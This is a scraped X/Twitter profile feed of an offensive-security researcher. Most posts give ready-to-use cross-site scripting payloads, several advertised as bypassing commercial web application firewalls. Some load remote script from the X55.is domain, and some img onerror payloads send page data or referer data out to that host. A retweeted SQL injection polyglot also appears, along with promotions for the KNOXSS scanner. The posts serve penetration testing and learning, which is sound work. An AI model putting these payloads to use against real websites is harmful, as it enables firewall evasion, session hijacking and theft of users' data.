
Brute Logic
@BRuteLogic
Followers
63K
Following
8K
Media
786
Statuses
13K
#CyberSecurity | #XSS | #WAF #bypass | #hack2learn | @RodoAssis | @KN0X55 | https://t.co/GyZaXU7FX9
Brazil 🇧🇷
Joined October 2009
One #XSS Payload to Rule Them All. #Bypass Akamai, Imperva and CloudFlare #WAF. <A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>. #hack2learn @KN0X55
21
166
737
RT @KN0X55: 🚨 KNOXSS GIVEAWAY July 2025. ✅ Follow us.✅ Like and share this. 🎁 Prize: KNOXSS Pro for 1 Month . 🏆 Results: July 7th (3 winner….
0
120
0
RT @BRuteLogic: This might trick some #XSS filters out there, including CloudFlare's. <Svg OnLoad="alert//>%0A(1)".
0
28
0
Just another #XSS construct that some of you might find interesting and hopefully useful someday.
1
2
29
RT @KN0X55: *** KNOXSS GIVEAWAY June 2025 ***. Directions:. 1. Like.2. Share.3. Be a follower. Prize: KNOXSS Pro for 1 Month. Results: June….
0
153
0
RT @PaulosYibelo: Wild browser hack from @J0R1AN - a clean, convincing doubleclickjacking PoC that doesn’t rely on clicking specific spots.….
0
4
0
RT @BRuteLogic: Our blog was shutted down in the beginning of this year. But here's the Internet Archive version o….
0
14
0
RT @BRuteLogic: Best Alternatives to "alert(1)" #XSS Payload. 1. import('//X55.is'). 2. $.getScript('//X55.is').htt….
0
53
0
Best Alternatives to "alert(1)" #XSS Payload. 1. import('//X55.is'). 2. $.getScript('//X55.is'). 3. appendChild(createElement'script').src='//X55.is'. Tip: use src attribute to store '//X55.is'. #hack2learn.
8
53
179
RT @KN0X55: KNOXSS v4.1.1 is out! 😎. Now with OPEN REDIRECT detection and proof!. Also with bug fixes and speed improvements. Available no….
0
6
0
This might trick some #XSS filters out there, including CloudFlare's. <Svg OnLoad="alert//>%0A(1)".
0
28
166
RT @RodoAssis: SQLi Polyglot*. &1/*'/*"/**/||1#\. or. and-1/*'/*"/**/||1--+\. It performs injection on single and double quotes scenarios a….
0
44
0
RT @BRuteLogic: Now w/ our you can also. => Exfiltrate DATA. <Img Src=//X55.is/d4t4/ OnError=fetch(src+DATA)>.<Img….
0
23
0
Now w/ our you can also. => Exfiltrate DATA. <Img Src=//X55.is/d4t4/ OnError=fetch(src+DATA)>.<Img Src=//X55.is/d4t4/ OnError=location=src+DATA>. (REFERER data).<Img Src=//X55.is OnLoad=location=src>. => Redirect (w/ any subdomain).
Use of Our Domain in #XSS. 1. Replacing alert(1):.'-import('//X55.is')-'.<Svg OnLoad=import('//X55.is')>. 2. As href or src attributes:.<Base Href=//X55.is>.<Script Src=//X55.is>. 3. Jumping to # for custom JS:.
0
23
103